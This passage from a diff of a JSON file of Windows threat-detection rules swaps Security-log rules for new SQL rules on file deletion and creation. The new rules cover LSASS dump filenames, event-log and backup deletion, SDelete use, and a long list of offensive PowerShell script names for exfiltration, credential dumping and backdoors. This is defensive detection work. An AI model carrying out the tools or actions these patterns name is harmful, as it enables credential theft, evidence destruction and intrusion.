Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. 
It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate used of encrypted ZIP files" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" - }, - { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' 
ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' 
AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects 
dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health 
monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" - ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" - }, - { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unlikely" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + 
"SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename 
LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.discovery" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -798,3013 +733,3002 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE 
